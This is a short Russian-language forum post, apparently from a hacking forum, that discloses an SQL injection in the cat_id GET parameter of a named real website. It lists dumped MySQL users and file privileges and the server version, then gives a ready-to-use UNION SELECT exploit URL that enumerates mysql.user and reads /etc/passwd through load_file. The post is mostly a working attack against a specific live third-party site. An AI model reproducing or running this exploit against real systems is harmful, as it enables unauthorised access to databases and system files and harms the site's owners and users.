24.05.2017, 16:13
|
|
Познающий
Регистрация: 09.05.2015
Сообщений: 40
Провел на форуме:
14926
Репутация:
17
|
|
SQLi с чтением файла из файловой системы
Сайт:bbgv.org
Уязвимый параметор: cat_id через GET
root:Y,root:Y,root:Y,:N,:N,bbgv_web:N,bbgv_bk:N
root@localhost:5.1.73:redhat-linux-gnu:x86_64
Эксплоит:
Код:
view-source:http://bbgv.org/bbgv-events/events.html?cat_id=-1 union all select 1,2,3,group_concat(user,0x3a,file_priv),5,6,7,8,9,10,user(),12,13,14,15,load_file('/etc/passwd'),17,18,19,20,21,22,23,24,25,26 from mysql.user --+
|
|
|